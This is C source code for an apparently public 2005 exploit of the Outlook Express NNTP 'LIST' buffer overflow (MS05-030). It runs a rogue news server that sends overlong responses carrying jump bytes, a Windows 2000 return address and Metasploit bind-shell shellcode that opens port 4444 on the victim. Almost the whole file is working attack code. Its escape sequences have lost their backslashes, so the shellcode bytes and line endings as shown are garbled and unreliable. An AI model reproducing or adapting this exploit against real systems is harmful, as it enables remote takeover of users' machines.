#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32")

/* win32_bind - EXITFUNC=process LPORT=4444 Size=344 
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x96"
"x27xc8x3ex83xebxfcxe2xf4x6ax4dx23x73x7exdex37xc1"
"x69x47x43x52xb2x03x43x7bxaaxacxb4x3bxeex26x27xb5"
"xd9x3fx43x61xb6x26x23x77x1dx13x43x3fx78x16x08xa7"
"x3axa3x08x4ax91xe6x02x33x97xe5x23xcaxadx73xecx16"
"xe3xc2x43x61xb2x26x23x58x1dx2bx83xb5xc9x3bxc9xd5"
"x95x0bx43xb7xfax03xd4x5fx55x16x13x5ax1dx64xf8xb5"
"xd6x2bx43x4ex8ax8ax43x7ex9ex79xa0xb0xd8x29x24x6e"
"x69xf1xaex6dxf0x4fxfbx0cxfex50xbbx0cxc9x73x37xee"
"xfexecx25xc2xadx77x37xe8xc9xaex2dx58x17xcaxc0x3c"
"xc3x4dxcaxc1x46x4fx11x37x63x8ax9fxc1x40x74x9bx6d"
"xc5x74x8bx6dxd5x74x37xeexf0x4fxd9x62xf0x74x41xdf"
"x03x4fx6cx24xe6xe0x9fxc1x40x4dxd8x6fxc3xd8x18x56"
"x32x8axe6xd7xc1xd8x1ex6dxc3xd8x18x56x73x6ex4ex77"
"xc1xd8x1ex6exc2x73x9dxc1x46xb4xa0xd9xefxe1xb1x69"
"x69xf1x9dxc1x46x41xa2x5axf0x4fxabx53x1fxc2xa2x6e"
"xcfx0ex04xb7x71x4dx8cxb7x74x16x08xcdx3cxd9x8ax13"
"x68x65xe4xadx1bx5dxf0x95x3dx8cxa0x4cx68x94xdexc1"
"xe3x63x37xe8xcdx70x9ax6fxc7x76xa2x3fxc7x76x9dx6f"
"x69xf7xa0x93x4fx22x06x6dx69xf1xa2xc1x69x10x37xee"
"x1dx70x34xbdx52x43x37xe8xc4xd8x18x56xe8xffx2ax4d"
"xc5xd8x1exc1x46x27xc8x3e";

struct
{
DWORD dwJMPEBX;
char *szDescription;
}targets[] = 
{
{0x7803382b, "win2k sp4 all language"}
},v;

void usage(char *p)
{
int i;
printf( "Usage: %s <type>n"
"[type]n", p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%dt%sn", i, targets[i].szDescription);
}
}

void main(int argc, char **argv)
{
struct sockaddr_in server,client;
WSADATA wsd;
SOCKET s2,s3;
int ret;
char szRecvBuff[0x100];
char szSend[] = "200rn";
int i,iType;
char szEvil[0x3000], szTmp[0x10];

printf( "MS OE NNTP "LIST" Buffer Overflow (MS05-030) EXPn"
"Credits: Bug found by iDEFENSEn"
"coded by eyas < eyas at xfocus.org>n"
"http://www.xfocus.netnn");

if(argc!=2)
{
usage(argv[0]);
return;
}

iType = atoi(argv[1]);


if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%dn", WSAGetLastError());
return;
}
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(119);
server.sin_addr.s_addr= 0;
ret = bind(s2, (struct sockaddr *)&server, sizeof(server));
ret = listen(s2, 100);
printf("[+] Listen on TCP 119.n");
while(1)
{
ret=sizeof(client);
s3 = accept(s2, (struct sockaddr *)&client, &ret);
printf("[+] Connection accepted from %s:%dn", 
inet_ntoa(client.sin_addr), ntohs(client.sin_port));

printf("[+] Send welcome information.n");
send(s3, szSend, strlen(szSend), 0);

ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-1] = 'x0';
printf("[+] Recv: [%s]n", szRecvBuff);
send(s3, szSend, strlen(szSend), 0);
printf("[+] Send response.n");

ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-4] = 'x0';
printf("[+] Recv: [%s]n", szRecvBuff);
printf("[+] send evil buff.n");

strcpy(szTmp, "xEBx06xEBx06");
memcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4);
szTmp[8]='x0';
strcpy(szEvil, "215 listrngroup aaaa");
//for(i=0;i<0x2598;i++)
//for(i=0;i<0x30;i++)
for(i=0;i<0x2598+0x200;i+=8)
strcat(szEvil, szTmp);
strcat(szEvil, (char *)scode);
strcat(szEvil, " 1 yrn.rn");
send(s3, szEvil, strlen(szEvil), 0);
Sleep(1000);
closesocket(s3);
printf("[+] close connectionn");
}

WSACleanup();
return;
}

// www.Syue.com [2005-06-24]